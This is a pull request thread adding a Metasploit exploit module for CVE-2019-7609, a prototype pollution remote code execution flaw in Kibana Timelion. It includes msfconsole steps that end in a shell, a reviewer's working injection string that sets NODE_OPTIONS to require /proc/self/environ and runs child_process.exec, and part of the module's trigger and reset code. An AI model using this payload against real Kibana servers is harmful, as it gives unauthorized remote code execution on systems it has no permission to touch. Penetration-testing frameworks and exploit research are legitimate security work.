### PR TITLE
Kibana Timelion Prototype Pollution RCE (CVE-2019-7609)

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a module to exploit CVE-2019-7609, a prototype pollution vulnerability that results in RCE.

Leaving it as draft for now since the cleanup method isn't working right (you don't stop getting shells....)

## Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use use exploit/linux/http/kibana_timelion_prototype_pollution_rce`
- [ ] Do: `set rhost [ip]`
- [ ] Do: `set lhost [ip]`
- [ ] Do: `run`
- [ ] You should get a shell as the kibana user.

### CODE REVIEW

**Comment by sempervictus** [comment]
Timelion queries are chained w `,`. Maybe we can fix the subsequent executions by way of
```ruby
    rst = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"
    if reset
      pload = rst
    else
      # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS
      pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ'),#{rst}|
```
?

**Comment by h00die** [comment]
> Timelion queries are chained w `,`. Maybe we can fix the subsequent executions by way of
> 
> ```ruby
>     rst = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"
>     if reset
>       pload = rst
>     else
>       # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS
>       pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ'),#{rst}|
> ```
> 
> ?

Will give it a try Monday, I dont have any prior experience with Kibana, let alone timeline, so the input is definitely appreciated!

File: modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb [hunk 1]
```diff
@@ -0,0 +1,185 @@
...
+    @xsrf = get_xsrf
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?
+
+    print_status('Trigginger payload execution via canvas socket')
+    trigger_socket
+    print_status('Waiting for shells')
+    Rex.sleep(datastore['WFSDELAY'] / 10)
+    print_status('Unsetting to stop raining shells from a lacerated kibana')
+    send_injection(reset: true)
+    trigger_socket
```
[the remark this answers is not in the document]
Comment (h00die) [reply modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb:183]: Oh, it's one big race.... Depending on the speed of the computer, I definitely see more or less shells. A VM will give me 10, an i7 laptop will give me 40. (this is down from 40 and 100).

So I think @sempervictus 's original idea was too fast, it set it and unset before the payload had a chance to trigger.  I think unsetting `on_new_session` is a good idea, but at that point its too late as its kicked off a ton of times.  I like the idea of doing the `@reset_done` checks and trying to fire ASAP, so I'll take that.  However, the (good?) problem still exists of many shells.

**Comment by sjanusz-r7** [comment]
# Release Notes
Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

**Pull request merged**